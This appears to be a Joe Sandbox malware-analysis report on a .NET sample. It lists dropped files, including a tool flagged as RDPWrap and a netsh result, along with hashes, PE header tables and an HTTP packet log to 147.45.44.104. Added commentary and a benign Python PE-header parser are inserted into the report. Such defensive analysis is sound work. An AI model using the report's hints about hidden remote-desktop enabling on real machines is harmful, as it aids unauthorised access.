                                                  SHA-512:BE01EC7F7614EDE323B10F3D715190A41C4B6A4BDEAD804F14FB58F7E61E886058BB1604008382F3F88A48675DC3B8873E3D1B809FC87A51E3D394036C98FF7E
                                                  Malicious:false
Preview (UTF-16 WER metadata decoded; cut off in the report inside the ProcessInformation element):
  <?xml version="1.0" encoding="UTF-16"?>
  <WERReportMetadata>
    <OSVersionInformation>
      <WindowsNTVersion>10.0</WindowsNTVersion>
      <Build>19045</Build>
      <Product>(0x30): Windows 10 Pro</Product>
      <Edition>Professional</Edition>
      <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>
      <Revision>2006</Revision>
      <Flavor>Multiprocessor Free</Flavor>
      <Architecture>X64</Architecture>
      <LCID>2057</LCID>
    </OSVersionInformation>
    <ProcessInformation>
      <Pid>6468</Pi
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):4896
                                                  Entropy (8bit):4.5737246520711095
                                                  Encrypted:false
                                                  SSDEEP:48:cvIwWl8zsAJg77aI9B7SWpW8VY6Ym8M4Jz3Fw+q8vkFKuQNNd:uIjfGI7L7z7VqJOK2KFNNd
                                                  MD5:ED469E14AD97BAECA43472FB67FBBF39
                                                  SHA1:970252D4E2F41E9AEA7C58557EFE2116D58E7566
                                                  SHA-256:B957988384C38378FF5324C040E5B59A375D5B7A4FB74FCA4F97F1248B972BEC
                                                  SHA-512:A810C82BFB15D459955F56A227A038A24DD9B70C114BB93B26B1D8B694285249A04CB9DF709A6E9D1AA1AE1F78F51765DCD94098DCE345CAB3DAA402FD79E789
                                                  Malicious:false
Preview (CRLF line breaks restored; cut off in the report inside the ram argument):
  <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
  <req ver="2">
    <tlm>
      <src>
        <desc>
          <mach>
            <os>
              <arg nm="vermaj" val="10" />
              <arg nm="vermin" val="0" />
              <arg nm="verbld" val="19045" />
              <arg nm="vercsdbld" val="2006" />
              <arg nm="verqfe" val="2006" />
              <arg nm="csdbld" val="2006" />
              <arg nm="versp" val="0" />
              <arg nm="arch" val="9" />
              <arg nm="lcid" val="2057" />
              <arg nm="geoid" val="223" />
              <arg nm="sku" val="48" />
              <arg nm="domain" val="0" />
              <arg nm="prodsuite" val="256" />
              <arg nm="ntprodtype" val="1" />
              <arg nm="platid" val="2" />
              <arg nm="tmsi" val="533793" />
              <arg nm="osinsty" val="1" />
              <arg nm="iever" val="11.789.19041.0-11.0.1000" />
              <arg nm="portos" val="0" />
              <arg nm="ram" val="409
                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe
                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1785344
                                                  Entropy (8bit):6.646511331349125
                                                  Encrypted:false
                                                  SSDEEP:24576:+rKxoVT2iXc+IZP+6WiaTAsN/3ebTvK+63CWH8iA/iD2hgPjcC8SVdKumYr7:vHZGpdqYH8ia6GcKuR7
                                                  MD5:C213162C86BB943BCDF91B3DF381D2F6
                                                  SHA1:8EC200E2D836354A62F16CDB3EED4BB760165425
                                                  SHA-256:AC91B2A2DB1909A2C166E243391846AD8D9EDE2C6FCFD33B60ACF599E48F9AFC
                                                  SHA-512:B3EAD28BB1F4B87B0C36C129864A8AF34FC11E5E9FEAA047D4CA0525BEC379D07C8EFEE259EDE8832B65B3C03EF4396C9202989249199F7037D56439187F147B
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
Antivirus:
  • Joe Sandbox ML: 100%
  • ReversingLabs: 68%
  • Virustotal: 78%
                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...#.CZ.................4..........<7.......P....@..............................................@...................................`...{.......................^...................................................................................text... ........................... ..`.itext..|....0... .................. ..`.data...x....P.......8..............@....bss.....O...p.......L...................idata...............L..............@....tls.................`...................rdata...............`..............@..@.reloc...^.......`...b..............@..B.rsrc....{...`...|..................@..@.............p......................@..@................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):37376
                                                  Entropy (8bit):5.7181012847214445
                                                  Encrypted:false
                                                  SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                                                  MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                                                  SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                                                  SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                                                  SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                                                  Malicious:false
Antivirus:
  • ReversingLabs: 0%
  • Virustotal: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                  File Type:MS Windows registry file, NT/2000 or above
                                                  Category:dropped
                                                  Size (bytes):1835008
                                                  Entropy (8bit):4.465763020237221
                                                  Encrypted:false
                                                  SSDEEP:6144:aIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNxdwBCswSbM:vXD94+WlLZMM6YFHP+M
                                                  MD5:BCB4CD0E537A8DFFB647261E44132AF1
                                                  SHA1:CBD684DF944D683519E8AB8AF0F6D42980581B31
                                                  SHA-256:DFF84F36BCA4A58320B59B386A085789EC1AC8E4B8734A8439A38B6E63ADB706
                                                  SHA-512:9551AE823B976DB8EE8C68AA5B11E57CEA4073EDDDF2F6816F7E3FFEB4AD17C8E331B9E541514F930B3B26EAF4B9D85B7169960038FED05E03131B76DDD60F31
                                                  Malicious:false
                                                  Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..B.!...............................................................................................................................................................................................................................................................................................................................................YuU.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\netsh.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):7
                                                  Entropy (8bit):2.2359263506290326
                                                  Encrypted:false
                                                  SSDEEP:3:t:t
                                                  MD5:F1CA165C0DA831C9A17D08C4DECBD114
                                                  SHA1:D750F8260312A40968458169B496C40DACC751CA
                                                  SHA-256:ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
                                                  SHA-512:052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
                                                  Malicious:false
                                                  Preview:Ok.....
                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):5.320178905368983
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  • DOS Executable Generic (2002/1) 0.01%
                                                  File name:SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe
                                                  File size:12'800 bytes
                                                  MD5:5057d16e9fb573fb3924b9c3dba53260
                                                  SHA1:ea177b2f35ca01d2e128bd876e56a548c3f69007
                                                  SHA256:06e0a0da4cabec34eeb742c985b969260256aa15b50e14fddcc12eee7ac52fd2
                                                  SHA512:af4a46df974f2bdcff52bdda48d5a7440d8b022f919c2107d4f719fd6ee8a801341950420dd213fb062b67a4d11f480d9057a6363c81025cd477a5ab37b868db
                                                  SSDEEP:384:hE8XjVVt/97YdaQ5QFcWqUM6kYcV63UiJFnh:HzftmgQKdQYcV6kizh
                                                  TLSH:2D42090093E50076E639527E65255B0AAFB3D57F3D0797AF384C592E3FB219082137EA
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Oi............"...0............."6... ...@....@.. ....................................`................................
                                                  Icon Hash:90cececece8e8eb0
                                                  Entrypoint:0x403622
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0xF215694F [Sat Sep 13 23:31:27 2098 UTC] (future-dated, high bit set; for a .NET assembly this is the normal result of a deterministic compiler build, where the field holds a hash of the compilation rather than a link time, so the date by itself is not evidence of tampering)
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
(followed by 97 repetitions of "add byte ptr [eax], al", which is how the disassembler renders the 00 00 zero padding after the six-byte stub; 00402000h is the image base 0x400000 plus the IAT directory at RVA 0x2000, i.e. the import slot for mscoree.dll!_CorExeMain, the standard unmanaged entry stub of a .NET executable)
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x35d0           0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x4000           0x141c        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x6000           0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x3530           0x38          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0x1628        0x1800    8069dbd47fbf6830d6c48ad5d9db9c27  False     0.5305989583333334  data       5.127352070786765    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x4000           0x141c        0x1600    f7d8ee7ab3d5878618789117b3cb15f1  False     0.3737571022727273  data       5.288126044255427    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x6000           0xc           0x200     c0861df6173ac6f99708190d2e19c6c8  False     0.044921875         data       0.08153941234324169  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA     Size    Type                                                                                Language  Country  ZLIB Complexity
RT_VERSION   0x4090  0x254   data                                                                                                   0.45805369127516776
RT_MANIFEST  0x42f4  0x1123  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                      0.4043765671301573
DLL          Import
mscoree.dll  _CorExeMain
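Added example, not part of the Joe Sandbox report and not the sample's own code: a small Python parser that reads the same PE32 headers the static tables above are built from and applies the standard managed-executable check, namely a non-empty IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR together with an entry stub of the form jmp dword ptr [IAT slot] whose slot resolves to mscoree.dll!_CorExeMain. Because the analysed file is not available offline, build_sample_pe() constructs a minimal one-section image whose entry point (RVA 0x3622), image base (0x400000), IAT (0x2000, 8 bytes), CLR header (0x2008, 0x48 bytes), import directory (0x35d0, 0x4f bytes) and link timestamp (0xF215694F) mirror the values reported above; everything else in that constructed image (the CLR header contents, the padding, the omitted .rsrc and .reloc sections) is an assumption made for illustration. Only PE32 is handled.

```python
import struct

# Data-directory indices from the PE/COFF specification.
DIR_IMPORT, DIR_IAT, DIR_COM_DESCRIPTOR = 1, 12, 14


def _cstr(data, off):
    return data[off:data.index(b"\0", off)].decode("ascii")  # NUL-terminated ASCII at file offset


def _rva_to_off(sections, rva):
    """Map an RVA to a file offset through the section that contains it."""
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw_size"]):
            return rva - s["va"] + s["raw_ptr"]
    raise ValueError(f"RVA {rva:#x} is not backed by any section")


def _parse_imports(data, sections, import_dir):
    """Walk the IMAGE_IMPORT_DESCRIPTOR array and return {dll: [imported names]}."""
    imports, rva = {}, import_dir[0]
    off = _rva_to_off(sections, rva) if rva else None
    while off is not None:
        oft, _ts, _fwd, name_rva, ft = struct.unpack_from("<IIIII", data, off)
        if name_rva == 0 and ft == 0:  # an all-zero descriptor terminates the array
            break
        names, thunk = [], _rva_to_off(sections, oft or ft)  # prefer the unbound name table
        while (entry := struct.unpack_from("<I", data, thunk)[0]) != 0:
            # High bit set: import by ordinal; otherwise IMAGE_IMPORT_BY_NAME (2-byte hint + name).
            names.append(f"ordinal#{entry & 0xFFFF}" if entry & 0x80000000
                         else _cstr(data, _rva_to_off(sections, entry) + 2))
            thunk += 4
        imports[_cstr(data, _rva_to_off(sections, name_rva))] = names
        off += 20
    return imports


def parse_pe(data):
    """Headers of a PE32 image: entry point, data directories, sections, imports, and
    whether it is a managed (.NET) image whose entry stub jumps through the IAT."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    coff = e_lfanew + 4
    _machine, nsections, timestamp, _, _, opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (magic 0x10b) is handled here")
    entry_rva, image_base = struct.unpack_from("<I", data, opt + 16)[0], struct.unpack_from("<I", data, opt + 28)[0]
    ndirs = min(struct.unpack_from("<I", data, opt + 92)[0], 16)
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(ndirs)] + [(0, 0)] * (16 - ndirs)
    sections = []
    for i in range(nsections):
        off = opt + opt_size + 40 * i
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", data, off + 8)
        sections.append({"name": data[off:off + 8].rstrip(b"\0").decode("ascii"), "va": va,
                         "vsize": vsize, "raw_size": raw_size, "raw_ptr": raw_ptr})
    # Managed entry stub: FF 25 <addr> is "jmp dword ptr [addr]"; a .NET image jumps
    # through its IAT slot for mscoree!_CorExeMain and the CLR takes over from there.
    ep, jumps_through_iat = _rva_to_off(sections, entry_rva), False
    if data[ep:ep + 2] == b"\xff\x25":
        target, (iat_rva, iat_size) = struct.unpack_from("<I", data, ep + 2)[0], dirs[DIR_IAT]
        jumps_through_iat = image_base + iat_rva <= target < image_base + iat_rva + iat_size
    return {
        "entry_rva": entry_rva, "image_base": image_base, "timestamp": timestamp,
        # Roslyn deterministic builds store a content hash with the high bit set here instead of a link time.
        "timestamp_high_bit_set": bool(timestamp & 0x80000000),
        "directories": {i: d for i, d in enumerate(dirs) if d != (0, 0)},
        "sections": sections,
        "imports": _parse_imports(data, sections, dirs[DIR_IMPORT]),
        "is_dotnet": dirs[DIR_COM_DESCRIPTOR] != (0, 0),
        "entry_jumps_through_iat": jumps_through_iat,
    }


def build_sample_pe():
    """Constructed minimal PE32 image (not the analysed sample): a single .text section
    laid out at the RVAs the report lists, so the parser has offline input."""
    image_base, text_va, text_raw, text_ptr = 0x400000, 0x2000, 0x1800, 0x200
    text = bytearray(text_raw)
    def put(rva, blob):
        text[rva - text_va:rva - text_va + len(blob)] = blob
    put(0x2000, struct.pack("<II", 0x360C, 0))                                    # IAT (unbound)
    put(0x2008, struct.pack("<IHH", 0x48, 2, 5) + bytes(0x40))                    # CLR header: cb, v2.5 (assumed)
    put(0x35D0, struct.pack("<IIIII", 0x35F8, 0, 0, 0x3600, 0x2000) + bytes(20))  # import descriptor + terminator
    put(0x35F8, struct.pack("<II", 0x360C, 0))                                    # OriginalFirstThunk
    put(0x3600, b"mscoree.dll\0")
    put(0x360C, struct.pack("<H", 0) + b"_CorExeMain\0")                          # hint + name
    put(0x3622, b"\xff\x25" + struct.pack("<I", image_base + 0x2000))             # entry: jmp dword ptr [IAT]
    dirs = [(0, 0)] * 16
    dirs[DIR_IMPORT], dirs[DIR_IAT], dirs[DIR_COM_DESCRIPTOR] = (0x35D0, 0x4F), (0x2000, 8), (0x2008, 0x48)
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,
                      0x10B, 48, 0, text_raw, 0, 0, 0x3622, text_va, 0x4000, image_base, 0x2000, 0x200,
                      4, 0, 0, 0, 4, 0, 0, 0x8000, 0x200, 0, 2, 0x8560,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0xF215694F, 0, 0, len(opt), 0x22)
    sec = struct.pack("<8sIIIIIIHHI", b".text", 0x1628, text_va, text_raw, text_ptr, 0, 0, 0, 0, 0x60000020)
    dos = bytearray(0x80)
    dos[:2], dos[0x3C:0x40] = b"MZ", struct.pack("<I", 0x80)
    headers = bytes(dos) + b"PE\0\0" + coff + opt + sec
    return headers + bytes(text_ptr - len(headers)) + bytes(text)
```

Calling parse_pe(build_sample_pe()) returns is_dotnet and entry_jumps_through_iat both True, imports {"mscoree.dll": ["_CorExeMain"]} and timestamp_high_bit_set True. That last flag is what a Roslyn deterministic build leaves in the link-time field (a content hash rather than a time), which is why the 2098 date in the report is best treated as a build-configuration artifact to correlate with the other indicators rather than as proof of manipulation on its own.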
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Oct 8, 2024 03:30:54.014223099 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.019233942 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.019306898 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.022650003 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.027539015 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.663557053 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.663614988 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.663650990 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.663681030 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.663685083 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.663722038 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.663739920 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.663757086 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.663790941 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.663800955 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.663821936 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.663856983 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.663870096 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.663894892 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.663939953 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.669291019 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.669342041 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.669384003 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.669394016 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.669455051 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.669511080 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.754132986 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.754156113 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.754173040 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.754189014 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.754317999 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.754317999 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.758899927 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.758936882 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.758970976 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.758999109 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.759008884 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.759063959 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.763711929 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.763751030 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.763788939 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.763798952 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.763825893 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.763859987 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.763873100 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.768505096 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.768529892 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.768537998 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.768546104 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.768670082 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.774183035 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.774200916 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.774214983 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.774230003 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.774239063 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.774250031 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.774296999 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.774514914 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.778904915 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.822458029 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.844543934 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.844568968 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.844588041 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.844604015 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.844669104 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.847446918 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.849214077 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.849239111 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.849256039 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.849284887 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.849379063 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.853976011 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.854012012 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.854027987 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.854044914 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.854060888 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.854064941 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.854090929 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.858691931 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.858711958 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.858738899 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.858742952 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.858757019 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.858772993 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.858787060 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.858814955 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.863477945 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.863503933 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.863521099 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.863538027 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.863553047 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.863580942 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.868340015 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.868377924 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.868393898 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.868411064 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.868427038 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.868427992 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.868455887 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.873296976 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.873322010 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.873338938 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.873356104 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.873356104 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.873374939 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.873378038 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.873393059 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.873409986 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.873414993 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.873426914 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.873444080 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.873449087 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.873461008 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.873477936 CEST  80           49730      147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:54.873485088 CEST  49730        80         192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:54.873493910 CEST  80           49730      147.45.44.104  192.168.2.4
